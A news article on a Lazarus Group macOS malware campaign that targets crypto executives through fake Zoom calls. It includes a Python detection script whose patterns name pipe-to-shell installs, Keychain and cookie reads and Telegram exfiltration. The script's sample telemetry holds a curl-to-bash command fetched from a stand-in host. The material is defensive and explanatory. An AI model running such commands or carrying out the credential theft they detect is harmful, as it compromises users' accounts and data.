Lazarus Group Deploys macOS Malware Targeting Crypto Execs
Lawrence Jengar Apr 22, 2026 14:54
Lazarus Group launches macOS malware targeting crypto and fintech executives via fake Zoom calls, aiming to compromise critical credentials.
The notorious Lazarus Group, linked to the North Korean government, has launched a new macOS malware campaign targeting cryptocurrency and fintech executives. Dubbed "Mach-O Man," the malware is delivered through fake Zoom or Google Meet calls: during the call the victim is talked into running a command that quietly installs the malware in the background.
According to a report by Mauro Eldritch, founder of threat intelligence firm BCA Ltd., the campaign relies on social engineering rather than a software vulnerability to get past traditional security controls: because the victim launches the installer, there is no exploit for signature- or exploit-focused defences to catch. Once installed, the malware harvests browser credentials, cookies, macOS Keychain entries, and corporate access credentials. The stolen data is exfiltrated to the attackers via Telegram, after which a self-deletion script removes the malware's own files, leaving little on disk for a later forensic examination.
This campaign underscores Lazarus Group's continued evolution in targeting not just cryptocurrency-native firms but also traditional businesses involved in fintech. Security researchers warn that the malware could lead to account takeovers, financial losses, and exposure of critical corporate data.
A History of High-Profile Attacks
The Lazarus Group, active since at least 2009, is infamous for a series of high-profile cyberattacks. It has been linked to the $81 million Bangladesh Bank heist in 2016, the global WannaCry ransomware attack in 2017, and the $620 million Ronin Network hack in 2022. More recently, in 2025, the group reportedly orchestrated the $1.4 billion Bybit hack—the largest cryptocurrency theft to date.
The group's activities are believed to fund North Korea's state programs, including weapons development, while circumventing international sanctions. Over the years, Lazarus has demonstrated a knack for adapting its tactics, shifting from targeting financial institutions to cryptocurrency platforms and, with campaigns like this one, to the macOS workstations of the executives who run them.
Why This Matters for Crypto and Fintech
This latest attack highlights the increasing risks posed by state-sponsored hacking groups to the crypto and fintech sectors. With billions of dollars in digital assets at stake, cybersecurity remains a critical concern for companies operating in these industries. A purpose-built macOS tool set widens the ground defenders must cover: Macs are common on the desks of exactly the executives this campaign targets, and a lure that persuades the user to run a command needs no exploit at all.
For traders and businesses, the implications are clear: heightened vigilance is necessary. No legitimate Zoom or Google Meet session requires a participant to paste a command into Terminal, so any such request during a call should be treated as an attack and reported. Organizations should consider implementing robust endpoint security with telemetry that survives the malware's self-deletion, employee training on this kind of lure, alerting on outbound connections to the Telegram Bot API from hosts with no business reason for them, and network segmentation to limit the fallout of potential breaches. If a machine is suspected of compromise, browser sessions, Keychain-stored passwords and corporate tokens should be rotated immediately, since that is precisely what the malware takes.
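The behaviour chain described above (a user-executed install command, reads of browser and Keychain credential stores, a connection to the Telegram Bot API, and self-deletion) maps naturally onto endpoint telemetry. The following is an added illustration of how a detection rule could correlate those signals per host; it is not code from the report or from the malware. The JSON event format, field names, the `curl ... | bash` lure shape, the trusted-path heuristic and the scoring threshold are all assumptions, and the sample events are constructed.

```python
"""Correlate the Mach-O Man-style behaviour chain across endpoint telemetry.

Added example; telemetry schema, thresholds and sample events are assumptions.
"""
import json
import re
from collections import defaultdict

# Assumption: the lure has the victim run a download-and-execute one-liner.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")
# Keychain database and Chromium-family credential/cookie stores.
CRED_STORE = re.compile(r"/Library/Keychains/|/Cookies$|/Login Data$")
# The report names Telegram as the exfiltration channel.
EXFIL_HOSTS = {"api.telegram.org"}
# Heuristic: signed apps under these prefixes may legitimately read their own
# cookie stores; an executable in /tmp or the home directory may not.
TRUSTED_EXE_PREFIXES = ("/Applications/", "/System/")

# Constructed sample telemetry: one compromised host, one benign host.
SAMPLE_EVENTS = """
{"host":"mac-cfo","ts":1,"type":"process","pid":501,"ppid":400,"exe":"/bin/zsh","cmd":"curl -fsSL https://meet-update.example/fix.sh | bash"}
{"host":"mac-cfo","ts":2,"type":"process","pid":502,"ppid":501,"exe":"/private/tmp/.upd","cmd":"/private/tmp/.upd"}
{"host":"mac-cfo","ts":3,"type":"file_read","pid":502,"path":"/Users/cfo/Library/Keychains/login.keychain-db"}
{"host":"mac-cfo","ts":4,"type":"file_read","pid":502,"path":"/Users/cfo/Library/Application Support/Google/Chrome/Default/Cookies"}
{"host":"mac-cfo","ts":5,"type":"network","pid":502,"dst_host":"api.telegram.org","dst_port":443}
{"host":"mac-cfo","ts":6,"type":"file_delete","pid":502,"path":"/private/tmp/.upd"}
{"host":"mac-dev","ts":7,"type":"process","pid":700,"ppid":1,"exe":"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome","cmd":"Google Chrome"}
{"host":"mac-dev","ts":8,"type":"file_read","pid":700,"path":"/Users/dev/Library/Application Support/Google/Chrome/Default/Cookies"}
{"host":"mac-dev","ts":9,"type":"network","pid":700,"dst_host":"www.google.com","dst_port":443}
"""


def detect(events_text):
    """Return {host: set of signal names} for every host that raised a signal."""
    procs = {}                       # (host, pid) -> {"exe": str, "lure": bool}
    signals = defaultdict(set)
    for line in events_text.strip().splitlines():
        ev = json.loads(line)
        host, pid = ev["host"], ev["pid"]
        key = (host, pid)
        if ev["type"] == "process":
            # A process is "lure-spawned" if its own command line is a
            # pipe-to-shell, or if it descends from one.
            parent = procs.get((host, ev["ppid"]))
            lure = bool(PIPE_TO_SHELL.search(ev.get("cmd", ""))) or (
                parent is not None and parent["lure"])
            procs[key] = {"exe": ev["exe"], "lure": lure}
            if lure:
                signals[host].add("lure_install")
            continue
        proc = procs.get(key)
        exe = proc["exe"] if proc else ""
        untrusted = not exe.startswith(TRUSTED_EXE_PREFIXES)
        if ev["type"] == "file_read" and untrusted and CRED_STORE.search(ev["path"]):
            signals[host].add("cred_store_read")
        elif ev["type"] == "network" and untrusted and ev["dst_host"] in EXFIL_HOSTS:
            signals[host].add("telegram_exfil")
        elif ev["type"] == "file_delete" and proc and ev["path"] == exe:
            # The process unlinked its own executable: the cover-up step.
            signals[host].add("self_delete")
    return dict(signals)


def flagged_hosts(events_text, min_signals=3):
    """Hosts where at least min_signals links of the chain were observed."""
    return sorted(h for h, s in detect(events_text).items() if len(s) >= min_signals)


if __name__ == "__main__":
    for host, found in detect(SAMPLE_EVENTS).items():
        print(host, sorted(found))
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

The benign host reads its own Chrome cookie store and is not flagged, because the reader is a signed application under `/Applications/`; the compromised host trips all four links. Requiring several links rather than any one keeps a lone `curl | bash` from a developer, or a legitimate Telegram client, from paging the on-call engineer, while still catching the chain before the self-deletion step has erased the evidence on disk.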
The Bigger Picture
As Lazarus Group expands its toolkit, it serves as a reminder that the cryptocurrency space remains a prime target for sophisticated, state-backed attackers. The group's history of adapting to new technologies and platforms emphasizes the need for proactive security measures. With the global crypto market cap exceeding $1 trillion as of 2026, the stakes for securing digital assets have never been higher.
Businesses and executives in the crypto and fintech sectors must stay informed about emerging threats and invest in advanced threat detection and response capabilities. The Lazarus Group’s latest campaign is a stark warning: no platform or operating system is immune.
Image source: Shutterstock
- lazarus group
- macos malware
- crypto security